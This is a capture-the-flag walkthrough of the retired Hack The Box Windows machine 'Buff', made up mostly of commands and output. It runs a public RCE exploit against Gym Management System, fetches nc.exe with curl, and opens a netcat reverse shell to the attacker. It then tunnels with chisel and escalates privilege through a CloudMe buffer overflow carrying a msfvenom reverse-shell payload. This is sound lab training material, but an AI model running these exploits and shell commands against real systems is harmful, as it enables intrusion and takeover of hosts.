HTB Walkthrough: Buff w/o Metasploit (retired)

Buff is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: Buff| Difficulty Level: Easy | Operating System: Windows

┌──(root💀kali)-[/home/kali/labs/HTB/Buff]
└─# nmap -sC -sV -oA Buff 10.10.10.198
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–10 18:42 EDT
Nmap scan report for 10.10.10.198
Host is up (0.20s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n’s Bro Hut

┌──(root💀kali)-[/home/kali/labs/HTB/Buff]
└─# nmap -p- -oA Allports 10.10.10.198
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–10 18:44 EDT
Nmap scan report for 10.10.10.198
Host is up (0.100s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
7680/tcp open pando-pub
8080/tcp open http-proxy

Browsing to http://10.10.10.198:8080/ reveals a web page. The application is using php files. Browsing to http://10.10.10.198:8080/contact.php reveals that the website is using “Gym Management Software 1.0”.

┌──(root💀kali)-[/home/kali/labs/HTB/Buff]
└─# searchsploit “Gym”
Gym Management System 1.0 — Unauthenticated Remote Code Execution
┌──(root💀kali)-[/home/kali/labs/HTB/Buff]
└─# searchsploit -m php/webapps/48506.py
Exploit: Gym Management System 1.0 — Unauthenticated Remote Code Execution

Running the exploit:

──(root💀kali)-[/home/kali/labs/HTB/Buff]
└─# python 48506.py ‘http://10.10.10.198:8080/'

You will get a webshell back but it is limited.

C:\xampp\htdocs\gym\upload> dir
PNG

Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\xampp\htdocs\gym\upload

12/05/2021 19:14 <DIR> .
12/05/2021 19:14 <DIR> ..
12/05/2021 19:14 53 kamehameha.php
1 File(s) 53 bytes
2 Dir(s) 8,079,413,248 bytes free

Getting a reverse shell. Transfer nc.exe file to target.
C:\xampp\htdocs\gym\upload> curl <Kali IP>:8000/nc.exe -o nc.exe

Executing a reverse shell. Open nc in kali (port 9876).
C:\xampp\htdocs\gym\upload> nc.exe <Kali IP> 9876 -e powershell.exe

And you will get a reverse shell + user flag.

Finding listening services

PS C:\xampp\htdocs\gym\upload> netstat -an | findstr “LISTENING”
netstat -an | findstr “LISTENING”
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING

Searching for port 8888, you will come across this article: https://www.speedguide.net/port.php?port=8888
The article mentions that “CloudMe” is vulnerable buffer overflow. You can check if we have CloudMe running by executing ‘tasklist’ command.

PS C:\Users\shaun\Desktop> tasklist
tasklist

Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
CloudMe.exe 4016 0 37,384 K

Transferring winpeas.exe to victim machine and running it.
Interesting output:

[+] Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions “C:\Users\shaun\Downloads\CloudMe_1112.exe”: shaun [AllAccess]

Looking for CloudMe exploits.
┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# searchsploit CloudMe 1.11.2
CloudMe 1.11.2 — Buffer Overflow (PoC)
┌──(root💀kali)-[/home/kali/labs/HTB/Buff]
└─# searchsploit -m windows/remote/48389.py

Since CloudMe is running on localhost, we can proxy it through Chisel.
(a) Server listening on Kali:
┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# ./chisel server -p 9877 — reverse

(b) Chisel client on Target:
PS C:\Users\shaun\Desktop> .\chisel.exe client <Kali IP>:9877 R:8888:127.0.0.1:8888

Changing the payload of CloudMe exploit for reverse shell.
From exploit code: #msfvenom -a x86 -p windows/exec CMD=calc.exe -b ‘\x00\x0A\x0D’ -f python

┌──(root💀kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP> LPORT=4444 EXITFUNC=thread -b “\x00\x0d\x0a” -f python

Replace the generated payload in CloudMe exploit. Open a netcat session on LPORT (kali). Run the exploit.
┌──(root💀kali)-[/home/kali/labs/HTB/Buff]
└─# python 48389.py

And you will get admin shell + root flag.
Note: Msfvenom generates payload in ‘buf’ variable and CloudMe exploit has payload in ‘payload’ variable. Just assign ‘buf’ to ‘payload’. (payload = buf)

Security Analyst